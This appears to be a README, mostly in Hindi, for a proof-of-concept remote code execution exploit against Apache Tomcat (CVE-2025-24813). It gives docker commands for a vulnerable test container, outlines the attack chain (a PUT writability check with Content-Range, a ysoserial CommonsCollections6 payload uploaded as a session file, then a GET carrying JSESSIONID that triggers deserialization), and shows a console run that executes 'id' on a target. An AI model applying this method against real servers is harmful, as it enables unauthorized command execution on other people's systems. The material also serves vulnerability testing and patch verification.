
Apache Tomcat में CVE-2025-24813 भेद्यता के लिए Proof of Concept (PoC) स्क्रिप्ट
CVE-2025-24813 के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट, Apache Tomcat में एक भेद्यता।
यह स्क्रिप्ट संबंधित लिंक के आधार पर संशोधित की गई है और मेरी आवश्यकताओं के अनुरूप बनाई गई है।
यह आधिकारिक Tomcat 9.0.90 इमेज पर आधारित वातावरण प्रदान करता है। यह सर्वर की रीड-ओनली प्रतिबंध को हटाता है और इसे सेशन डेटा को डिस्क पर सहेजने के लिए कॉन्फ़िगर करता है। फिर, यह ROOT.war फ़ाइल को Tomcat की webapps/ डायरेक्टरी में कॉपी करके स्वचालित रूप से एप्लिकेशन डिप्लॉय करता है।
docker build -t cve-2025-24813 .
docker run --name cve-2025-24813 -it -d -p 8080:8080 cve-2025-24813
check.txt फ़ाइल जिसमें Content-Range हेडर है, यह सत्यापित करने के लिए रखी जाती है कि सर्वर PUT अनुरोध स्वीकार कर रहा है।ysoserial का उपयोग करके एक पेलोड जनरेट किया जाता है।JSESSIONID के साथ GET अनुरोध भेजा जाता है, जो डिसीरियलाइज़ेशन को ट्रिगर करता है।$ python3 cve_2025_24813.py
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ███████╗ ██████╗ ██╗ ██╗ █████╗ ██╗██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██╔════╝ ╚════██╗██║ ██║██╔══██╗███║╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝███████╗█████╗ █████╔╝███████║╚█████╔╝╚██║ █████╔╝
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚════██║╚════╝██╔═══╝ ╚════██║██╔══██╗ ██║ ╚═══██╗
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗███████║ ███████╗ ██║╚█████╔╝ ██║██████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚══════╝ ╚══════╝ ╚═╝ ╚════╝ ╚═╝╚═════╝
--- Apache Tomcat Remote Code Execution PoC by Hakan Karabacak ---
Enter target URL (e.g., http://target.com:8080): http://target.com:8080
Enter command to execute (default: bash -c echo${IFS}$(id)>/tmp/RCE):
Enter path to ysoserial.jar (default: ysoserial.jar):
Enter ysoserial gadget chain (default: CommonsCollections6):
[*] Session ID: hk1337
[+] Server is writable via PUT: http://target.com:8080/check.txt
[*] Generating ysoserial payload for command: bash -c echo${IFS}$(id)>/tmp/RCE
[+] Payload generated successfully: payload.ser
[+] Payload uploaded with status 409 (Conflict): http://target.com:8080/hk1337.session
[+] Exploit succeeded! Server returned 500 after deserialization.
[+] Target http://target.com:8080 is vulnerable to CVE-2025-24813!
[+] Temporary file removed: payload.ser